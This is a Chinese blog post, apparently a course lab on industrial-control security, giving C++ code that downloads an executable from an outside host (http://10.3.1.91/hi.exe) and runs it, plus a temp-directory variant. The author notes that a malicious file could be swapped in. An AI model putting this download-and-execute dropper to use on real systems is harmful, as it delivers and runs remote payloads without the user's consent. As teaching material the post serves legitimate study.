工控安全系统编程之 下载并运行exe

最新推荐文章于 2021-12-22 17:22:45 发布
最新推荐文章于 2021-12-22 17:22:45 发布
阅读量322 收藏
点赞数
分类专栏: 工控安全
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/108476582
版权

工控安全系统编程之 下载并运行exe

一、实验要求

  1. 熟悉VC++编程环境
  2. 编程实现下载http://10.3.1.91/hi.exe到本地 ,并运行

二、源代码

#include <Windows.h>
#include <UrlMon.h>
#pragma comment(lib, "urlmon.lib")

int main()
{
	URLDownloadToFile(0, "http://10.3.1.91/hi.exe", "D:\\hi.exe", 0, 0);
	WinExec("D:\\hi.exe", 0);
	return 0;
}

三、程序运行
URLDownToFile函数从指定网址下载exe文件,WinExec函数执行下载下来的文件

四、总结
通过本次实验,我对C++的系统函数有了一定的认识,学会了urldownloadtofile函数下载资源和winexec函数执行程序,若把实验中的hi.exe写为恶意文件,则可以进行进一步的利用。

扩展:

实现下载文件到临时目录,然后移动文件到用户目录,设置该文件为开机启动.

#include <Windows.h>
#include <UrlMon.h>
#include <strsafe.h>

#pragma comment(lib, "urlmon.lib")

int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nShowCmd )
{
	CHAR	szTempPath[MAX_PATH];

	GetTempPath(ARRAYSIZE(szTempPath), szTempPath);
	GetTempFileName(szTempPath, NULL, 0, szTempPath);
	URLDownloadToFile(NULL, "http://10.3.1.91/hi.exe", szTempPath, 0, NULL);
	WinExec(szTempPath, 0);
	return	0;
}
Alsn86
关注
专栏目录
工控安全 西门子S7-300攻击分析_plc300漏洞
2401_84264536的博客
04-27 1128
一、概述随着等保2.0的普及,工控安全大家也越来越重视,研究工控安全的小伙伴也越来越多。工控安全主要包括工控设备私有协议的安全分析,工控设备固件系统安全以及工控设备应用程序安全等。西门子PLC广泛应用于工业控制系统,本文主要描述西门子PLC系列S7-300的攻击过程与思路,并介绍演示一些适合小伙伴们学习的工控工具和框架。如有错误之处,欢迎指正,共同学习进步。
C#开发工控上位机编程 csdn_C#串口编程示例
weixin_39588911的博客
10-18 1217
[已排版,电脑浏览最佳]在单片机项目开发中,上位机也是一个很重要的部分,主要用于数据显示(波形、温度等)、用户控制(LED,继电器等),下位机(单片机)与 上位机之间要进行数据通信的两种方式都是基于串口的:USB转串口 —— 上位机和下位机通过USB转串口连接线直接相连进行数据交互;串口转WIFI(ESP8266) —— 上位机和下位机基于TCP/IP协议通过WIFI传输数据;串口转蓝牙(HC-0...
STM32中程序下载运行内部存储初识
weixin_42279760的博客
10-31 1430
此文档主要介绍在stm32程序下载运行时,FLASH和RAM的使用情况 1.背景介绍 因为stm32内部有两个存储空间,一个是片上的FLASH,一个是片上的RAM,其中FLASH相当于硬盘,其空间一般较大; RAM相当内存,其空间一般较小。不过使用者可以通过 BOOT1/BOOT0 引脚选择程序是在FLASH或RAM中运行(RAM运行执行效率较高)。 2.存储概况 以stm32f103zet6为例,此芯片的FLASH的起始地址为0x08000000,SIZE = 0x80000共512K字节;RAM的起始
下载http文件
一天一点进步
06-05 693
void download(const char *Url,const char *szlocal){ HINTERNET hSession = InternetOpen("RookIE/1.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); if (hSession != NULL) {  HINTERNET handle2 = InternetO
exe-自动安装
weixin_43781139的博客
07-14 2168
简介 许多病毒会以安装包的形式进行传播,一方面病毒作者可以修改合法软件的安装包实现捆绑安装,另一方面病毒可以将病毒本体隐藏在包内,避免被直接查杀。能够制作安装包的软件很多,本文将介绍几款主流软件及其制作的恶意软件的分析技巧。 1、MSI 许多软件的安装包都是.msi格式的,msi文件的能够像exe文件一样双击运行,但是查看msi文件的文件头却会发现,msi文件并不属于PE文件。 msi文件是Windows Installer的数据包,它采用了OLE(复合文件)结构,是一种压缩文件,里面包含安装(和卸载)程
写好的程序在自己电脑上运行很快,在工控机现场调试出现运行很慢的情况
weixin_42856569的博客
04-16 1013
问题:写好的程序在自己电脑上运行很快,在工控机现场调试出现运行很慢的情况 解决方法:emmmmm,因为自己是在优盘里点击exe文件运行的,请把它完全的移植到电脑上再运行 ...
Electron(Node.js)下载文件并执行.exe文件
一个头发贼多的小火鸡
12-22 2163
描述一下遇到的问题! 1.因为Electron软件需要使用特殊的文件层级包裹,里面携带一些驱动 固件等等,所以不能直接使用electron-update升级的方式去升级应用程序,所以另辟蹊径。 2.目前使用了VNISEdit 编译环境来编译安装包(NSIS脚本编译),下载时直接安装覆盖。 const http = require('http') const path = require('path') const fs = require('fs') http.get("http://172.
论坛杂志—工控家园第二期下载.zip
04-06
用户在下载运行此文件前,应确保其来自可信的源,并遵循安全操作规程,以防潜在的病毒或恶意软件。 快速接线模块.pdf 文件则可能是一个详细的技术文档,它详细介绍了如何快速、正确地连接和配置工业控制系统的...
工控杂志第十一期发布,欢迎免费下载.zip
09-24
用户在下载运行这个文件后,可以浏览工控杂志第十一期的全部内容,可能会有图文并茂的展示、视频演示、交互式功能等,以增强阅读体验。 工控杂志作为行业的知识传播媒介,每一期都会带来新的研究和实践成果,例如...
工控杂志第10期发布--欢迎大家下载.zip
09-25
用户需谨慎处理,确保从可靠来源下载,并运行前做好防病毒检查。 总的来说,《工控杂志》第10期的发布将为读者带来丰富的工业控制知识,无论你是行业从业者还是对此领域感兴趣的学习者,都将从中受益匪浅。通过深入...
strsafe.h.zip
07-27
3个版本的strsafe.h
WINDOWS“已使用临时配置文件登陆”解决方法
热门推荐
yupong的专栏
06-26 4万+
昨天装一台本本,装好后建了一个账户,后来又删除此账户加入域,域中有一账户和此删除的账户是同名的。然后郁闷的发现用域中的这个同名账户登陆系统总是提示“您已使用临时配置文件登陆”,在网上搜了许多的相关帖子,整理解决方法如下:1、  打开CMD窗口,输入whoami/user就可以很快知道当前用户名的SID是“S-1-5-21-1147494711-1253725596-776521015-1687”。...
Safe string in window
vingo888的专栏
09-04 707
http://msdn.microsoft.com/en-us/library/windows/desktop/ms647466(v=vs.85).aspx About Strsafe.h             3 out of 16 rated this helpful - Rate this topic                          Poor buff
运行.exe文件并获取返回值(使用WinExec和system的区别)
qq295456059的博客
08-29 3万+
运行.exe文件并获取返回值,使用WinExec和system有所区别:前者只能返回.exe是否成功被调用,后者可以返回.exe源码中main函数的return值。
智能制造与工控系统网络安全:挑战与解决方案
总体来说,智能制造行业的工控系统网络安全整体解决方案需要结合政策指导、技术进步和风险管理,确保在追求智能化生产的同时,保护好关键基础设施的安全,降低网络风险,保障企业的正常运行和工业生产的稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值